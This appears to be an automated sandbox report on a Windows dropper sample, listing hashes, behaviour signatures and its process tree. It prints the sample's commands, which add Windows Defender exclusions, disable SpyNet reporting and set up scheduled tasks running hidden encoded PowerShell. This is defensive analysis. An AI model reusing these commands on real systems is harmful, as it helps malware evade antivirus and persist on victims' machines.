Analysis
-
max time kernel
188s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 21:06
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2d3ad18f288af345af2fb0c319b3b3f5
-
SHA1
1e9d7ccc74e26b99403e494eafd4a0a8dae516fd
-
SHA256
eb00ed9a3114cd089951b8eee0074c32f9e755428ac7d24aa093b9194465bf46
-
SHA512
1155c2bc81462c0b67bae8bc95369240411a217168445db662cb445cb7a9bd30d86f7bf0ecf040f7729f98cd41fbcb65c761c12cbbe5c54e2abbdbf6e6a838fe
-
SSDEEP
196608:91OKn156tz5ZmHtScKM0vwTcE2X2q2CsthMfnq:3OQkl4+vwwEtftLB
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exeNeGgsRT.exepid process 1932 Install.exe 684 Install.exe 1284 NeGgsRT.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 1716 file.exe 1932 Install.exe 1932 Install.exe 1932 Install.exe 1932 Install.exe 684 Install.exe 684 Install.exe 684 Install.exe -
Drops file in System32 directory 4 IoCs
Processes:
NeGgsRT.exeInstall.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NeGgsRT.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NeGgsRT.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bgXzKyzKqQlJYhwcUn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1744 schtasks.exe 1680 schtasks.exe 624 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.EXEpid process 1428 powershell.EXE 1428 powershell.EXE 1428 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.EXEdescription pid process Token: SeDebugPrivilege 1428 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1716 wrote to memory of 1932 1716 file.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 1932 wrote to memory of 684 1932 Install.exe Install.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1924 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 684 wrote to memory of 1780 684 Install.exe forfiles.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1924 wrote to memory of 1100 1924 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1780 wrote to memory of 1864 1780 forfiles.exe cmd.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1100 wrote to memory of 852 1100 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 840 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1100 wrote to memory of 1736 1100 cmd.exe reg.exe PID 1864 wrote to memory of 1980 1864 cmd.exe reg.exe PID 1100 wrote to memory of 1736 1100 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zSBBE1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\7zSC2C4.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:852
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1736
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:840
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1980
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRDnBsOgK" /SC once /ST 09:18:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1680 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRDnBsOgK"4⤵PID:988
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRDnBsOgK"4⤵PID:568
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgXzKyzKqQlJYhwcUn" /SC once /ST 22:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ATaWoTwmuQXaDzxNA\BXblJsnkYCqsjju\NeGgsRT.exe\" P7 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:624
-
C:\Windows\system32\taskeng.exetaskeng.exe {3BC3E909-3567-4FB3-8320-C68BE357E402} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1568
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:792
-
C:\Windows\system32\taskeng.exetaskeng.exe {D0DA633A-1220-4B3B-845E-23AF65630AFE} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\ATaWoTwmuQXaDzxNA\BXblJsnkYCqsjju\NeGgsRT.exeC:\Users\Admin\AppData\Local\Temp\ATaWoTwmuQXaDzxNA\BXblJsnkYCqsjju\NeGgsRT.exe P7 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1284 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFmnTBbFL" /SC once /ST 02:27:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1744
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2